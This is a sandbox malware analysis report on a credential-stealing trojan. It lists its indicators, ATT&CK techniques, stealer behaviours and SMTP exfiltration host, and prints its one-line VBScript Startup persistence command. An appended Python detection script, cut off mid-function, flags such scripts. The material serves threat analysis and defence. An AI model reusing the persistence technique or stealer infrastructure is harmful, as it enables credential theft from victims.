Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; numbers in parentheses reproduce the count markers attached to each technique in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Scripting (1 1 1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1 2 1); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scripting (1 1 1); DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Process Injection (2 1 1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1 2); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (1 4 1); Process Injection (2 1 1)
Credential Access: OS Credential Dumping (2); Input Capture (1); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery (1); System Information Discovery (2 4); Security Software Discovery (3 1 1); Process Discovery (1); Virtualization/Sandbox Evasion (1 4 1); Application Window Discovery (1); System Network Configuration Discovery (1); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1 1); Data from Local System (2); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1 1); Non-Application Layer Protocol (2); Application Layer Protocol (2 3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1635011 | Sample: Wire Remittance Detail.exe | Start date: 11/03/2025 | Architecture: WINDOWS | Score: 100
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 10 other signatures
Network: api.ipify.org (104.26.13.205, ports 443, 49681, 49685, CLOUDFLARENETUS, United States); mail.iaa-airferight.com (46.175.148.58, port 25, ASLAGIDKOM-NETUA, Ukraine)
Process tree:
  Wire Remittance Detail.exe (started) | dropped: C:\Users\user\...\AssemblyFullName.exe (PE32), C:\Users\user\...\AssemblyFullName.vbs (ASCII), C:\...\AssemblyFullName.exe:Zone.Identifier (ASCII) | signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    InstallUtil.exe (started) | contacts api.ipify.org and mail.iaa-airferight.com | signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
  wscript.exe (started) | signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    AssemblyFullName.exe (started) | signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Injects a PE file into a foreign processes
      InstallUtil.exe (started) | signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detections for the submitted sample (Source, Scanner, Detection, Label):
• Wire Remittance Detail.exe: Virustotal, Detection: 54%
• Wire Remittance Detail.exe: ReversingLabs, Detection: 55%, Label: Win32.Trojan.Genie
• Wire Remittance Detail.exe: Avira, Detection: 100%, Label: TR/Dropper.Gen
Antivirus detections for dropped files (Source, Scanner, Detection, Label):
• C:\Users\user\AppData\Roaming\AssemblyFullName.exe: Avira, Detection: 100%, Label: TR/Dropper.Gen
• C:\Users\user\AppData\Roaming\AssemblyFullName.exe: Virustotal, Detection: 54%
• C:\Users\user\AppData\Roaming\AssemblyFullName.exe: ReversingLabs, Detection: 55%, Label: Win32.Trojan.Genie
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Domains (Name, IP, Active, Malicious, Antivirus Detection, Reputation):
• mail.iaa-airferight.com, IP: 46.175.148.58, Active: true, Malicious: false, Reputation: high
• api.ipify.org, IP: 104.26.13.205, Active: true, Malicious: false, Reputation: high
URLs (Name, Malicious, Antivirus Detection, Reputation):
• https://api.ipify.org/, Malicious: false, Reputation: high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-netWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.ipify.orgWire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netiWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/14436606/23354Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://account.dyn.com/Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.ipify.org/tInstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/11564914/23354;Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/2152978/23354Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://mail.iaa-airferight.comInstallUtil.exe, 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
IPs (IP, Domain, Country, ASN, ASN Name, Malicious):
• 46.175.148.58, Domain: mail.iaa-airferight.com, Country: Ukraine, ASN: 56394, ASN Name: ASLAGIDKOM-NETUA, Malicious: false
• 104.26.13.205, Domain: api.ipify.org, Country: United States, ASN: 13335, ASN Name: CLOUDFLARENETUS, Malicious: false
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1635011
                                                Start date and time:2025-03-11 09:21:57 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Wire Remittance Detail.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 97%
                                                • Number of executed functions: 188
                                                • Number of non-executed functions: 18
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 172.202.163.200
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Wire Remittance Detail.exe, PID 6892 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
Timeline (Time, Type, Description):
• 04:22:59, API Interceptor: 239x Sleep call for process: InstallUtil.exe modified
• 09:22:57, Autostart: Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs
IP context (Match; Associated Sample Name / URL | Detection | Threat Name | Context):
Match 46.175.148.58:
• SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exe | malicious | AgentTesla
• pbgjw8i8N7.exe | malicious | Snake Keylogger, VIP Keylogger
• G3uJOLisBq.exe | malicious | Snake Keylogger, VIP Keylogger
• yxoY9FvULu.exe | malicious | AgentTesla
• ShGhJDcXXI.exe | malicious | AgentTesla
• wpo28029 Changzhou Tairun.exe | malicious | AgentTesla
• gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger
• AmEZrFh7we.exe | malicious | Snake Keylogger, VIP Keylogger
• 3SgC5vaFEg.exe | malicious | AgentTesla
• SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exe | malicious | AgentTesla
Match 104.26.13.205 (Context for every row: api.ipify.org/):
• get_txt.ps1 | malicious | LummaC Stealer
• XkgoE6Yb52.ps1 | malicious | Unknown
• R1TftmQpuQ.bat | malicious | Targeted Ransomware
• SpacesVoid Setup 1.0.0.exe | malicious | Unknown
• Yoranis Setup.exe | malicious | Unknown
• BiXS3FRoLe.exe | malicious | TrojanRansom
• lEUy79aLAW.exe | malicious | TrojanRansom
• Simple1.exe | malicious | Unknown
• 2b7cu0KwZl.exe | malicious | Unknown
• file.exe | malicious | Unknown
Domain context (Match; Associated Sample Name / URL | Detection | Threat Name | Context):
Match mail.iaa-airferight.com (Context for every row: 46.175.148.58):
• SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exe | malicious | AgentTesla
• pbgjw8i8N7.exe | malicious | Snake Keylogger, VIP Keylogger
• G3uJOLisBq.exe | malicious | Snake Keylogger, VIP Keylogger
• yxoY9FvULu.exe | malicious | AgentTesla
• ShGhJDcXXI.exe | malicious | AgentTesla
• wpo28029 Changzhou Tairun.exe | malicious | AgentTesla
• gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger
• AmEZrFh7we.exe | malicious | Snake Keylogger, VIP Keylogger
• 3SgC5vaFEg.exe | malicious | AgentTesla
• SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exe | malicious | AgentTesla
Match api.ipify.org:
• TcSzPgyAqC1WEJQ.exe | malicious | AgentTesla | 104.26.12.205
• y27AF4qx0Q.exe | malicious | AgentTesla | 104.26.13.205
• nPqeSjgAQQ.exe | malicious | AgentTesla | 104.26.13.205
• FORTUNE ALLIANCE VSL's DESCRIPTION.pdf.bat.exe | malicious | AgentTesla | 104.26.12.205
• MV RUN LONG VSL's DETAILS.pdf.bat.exe | malicious | AgentTesla | 104.26.12.205
• ynH9fYoMvM.exe | malicious | AgentTesla | 172.67.74.152
• yxoY9FvULu.exe | malicious | AgentTesla | 104.26.13.205
• IyaoiEZEqZ.exe | malicious | AgentTesla | 172.67.74.152
• ShGhJDcXXI.exe | malicious | AgentTesla | 172.67.74.152
• file.exe | malicious | Unknown | 104.26.12.205
ASN context (Match; Associated Sample Name / URL | Detection | Threat Name | Context):
Match ASLAGIDKOM-NETUA (Context for every row: 46.175.148.58):
• SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exe | malicious | AgentTesla
• pbgjw8i8N7.exe | malicious | Snake Keylogger, VIP Keylogger
• G3uJOLisBq.exe | malicious | Snake Keylogger, VIP Keylogger
• yxoY9FvULu.exe | malicious | AgentTesla
• ShGhJDcXXI.exe | malicious | AgentTesla
• wpo28029 Changzhou Tairun.exe | malicious | AgentTesla
• gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger
• AmEZrFh7we.exe | malicious | Snake Keylogger, VIP Keylogger
• 3SgC5vaFEg.exe | malicious | AgentTesla
• SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exe | malicious | AgentTesla
Match CLOUDFLARENETUS:
• kissingwithbestexperiencedgirlfriendonhereformenice.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 104.21.80.1
• PO202503S.xlsm | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
• niceworkingskillwithbestideasevermade.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 104.21.16.1
• QUOTATION_FEBQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 104.21.32.1
• P.Order request for quotations.exe | malicious | FormBook | 172.67.148.163
• PAYMENT COPY.exe | malicious | FormBook | 172.67.148.163
• Enquiry Quote - 21834-01.exe | malicious | FormBook | 188.114.96.3
• New Order RFQ- 19A20060.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
• EM#U0130R_7880330875661236965345096345789_3479653.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
• kcDXTU4FJm.exe | malicious | LummaC Stealer | 104.21.21.102
Context for match 3b5074b1b5d032e5620f69f9f700ff0e (Associated Sample Name / URL | Detection | Threat Name; Context for every row: 104.26.13.205):
• PO202503S.xlsm | malicious | Snake Keylogger, VIP Keylogger
• RFQ - #10032025_pdf.vbs | malicious | Unknown
• U00b7pdf.vbs | malicious | Unknown
• QUOTATION_FEBQUOTE312025PDF.scr.exe | malicious | MSIL Logger
• New Order RFQ- 19A20060.exe | malicious | Snake Keylogger, VIP Keylogger
• SOLICITUD DE COTIZACI#U00d3N(UCU) 03-10-2025#U00b7pdf.vbs | malicious | Unknown
• SOLICITUD DE COTIZACI#U00d3N(UCU) 03-10-2025#U00b7pdf.vbs | malicious | Unknown
• ja811MqV4h.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer
• SHIPPING ADVICE#2025.exe | malicious | Snake Keylogger, VIP Keylogger
• BL-INVOICE DOCUMENTS.exe | malicious | Snake Keylogger, VIP Keylogger
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1129472
                                                                    Entropy (8bit):7.990608378291438
                                                                    Encrypted:true
                                                                    SSDEEP:24576:8E4cwG/FgJQfhA3D+Bwf6KLHPIlByEDT/MH1HoPw7rsecYjnTH:8EV5i2fy3Syvsk1+w7rsecYjT
                                                                    MD5:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    SHA1:94D13721934655C477647509025346D1B7E93344
                                                                    SHA-256:4587101C910C2AF014B4F604C0BA76717C1C8B3F360CE0A191E81158B691F6CC
                                                                    SHA-512:79B8C266EE83540BA82DF58BE2B00A5B3D1CCE9E563AA842F9F22AF3177A0E429B69188EE637367B0C941C858D47856CCE51D4A8ED3738F0FA0C41524B1C3DCA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................2..........>Q... ...`....@.. ....................................`..................................P..K....`............................................................................... ............... ..H............text...D1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................ Q......H........T..|E..........................................................*...(....*..0.......... ........8........E............8.....r...p(....rM..p(.... ....~....{t...9....& ....8........E........8.....V...& ....~....{7...:....& ....8........E........8......... ....~....{M...:X...& ....8M...*........%.Jo.7....&~.......*...~....*..(....*..0..h....... ........8........E................8......*(...... ....~....{}...9....& ....8.......o.... ....~....{E...9....& ....8........E...
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):90
                                                                    Entropy (8bit):4.843210913608063
                                                                    Encrypted:false
                                                                    SSDEEP:3:FER/n0eFHHoMEREaKC5/IpSmEudiHHn:FER/lFHIFiaZ5AiSin
                                                                    MD5:710A3AF77BD2476C230DFB2539CC2FB9
                                                                    SHA1:02DE77964F1E31F08625867AD6EC3959AE77F68C
                                                                    SHA-256:82F7C9C820962D953EF8168D01E96768926AAF840F1EA2430DA008683601E2F7
                                                                    SHA-512:9C8B792CCA038C89505ADB698AB60E0605E364F06797340A43DA359497AD165C166862CC54C35948132B48A4A9FE4D9FBFC0AFBFB7E0132BACF7C9F7A1E89D6E
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\AssemblyFullName.exe"""
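The 90-byte script above is the sample's whole persistence mechanism: one VBScript line in the user's Startup folder that passes a path under %APPDATA% to WScript.Shell.Run, so the copied payload (AssemblyFullName.exe) restarts at every logon without touching the registry. Note the tripled quotes: inside a VBScript string literal a double quote is written as two double quotes, so `"""C:\...exe"""` evaluates to the quoted command line `"C:\...exe"`. The following Python is an added example, not part of the Joe Sandbox report: it parses such Startup scripts, undoes the quote doubling, and flags launch targets that live in user-writable directories. The directory marker list and the `scan_startup_folders` helper are assumptions chosen for illustration.

```python
import os
import re

# Constructed sample: the one-line script the sandbox recovered from the Startup folder.
SAMPLE_STARTUP_VBS = r'CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\AssemblyFullName.exe"""'

# CreateObject("WScript.Shell").Run "<VBScript string literal>"
# A literal may contain "" (an escaped quote), so we accept either a non-quote or a doubled quote.
_RUN_RE = re.compile(
    r'CreateObject\(\s*"WScript\.Shell"\s*\)\s*\.Run\s+"((?:[^"]|"")*)"',
    re.IGNORECASE,
)

# Directories a standard user can write to (assumption: tune per estate). A Startup entry
# launching from here was not placed by an installer running as administrator.
USER_WRITABLE_MARKERS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\",
    "\\appdata\\locallow\\",
    "\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
)


def extract_run_targets(script_text: str) -> list[str]:
    """Return every command string handed to WScript.Shell.Run, with VBScript quote doubling undone."""
    return [m.group(1).replace('""', '"') for m in _RUN_RE.finditer(script_text)]


def executable_path(command: str) -> str:
    """Pull the program path out of a Run() command line: the quoted token, else the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def is_user_writable(path: str) -> bool:
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE_MARKERS)


def analyze_startup_script(script_text: str) -> dict:
    """Classify one Startup-folder script. 'suspicious' means it launches from a user-writable path."""
    commands = extract_run_targets(script_text)
    executables = [executable_path(c) for c in commands]
    flagged = [p for p in executables if is_user_writable(p)]
    if flagged:
        verdict = "suspicious"
    elif executables:
        verdict = "unknown"        # launches something, but from a location we do not flag
    else:
        verdict = "no-run-call"    # no WScript.Shell.Run at all
    return {"commands": commands, "executables": executables, "flagged": flagged, "verdict": verdict}


def scan_startup_folders() -> list[dict]:
    """Hypothetical helper: analyze every script in the per-user and all-users Startup folders."""
    folders = [
        os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
        os.path.join(os.environ.get("ProgramData", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
    ]
    results = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for name in os.listdir(folder):
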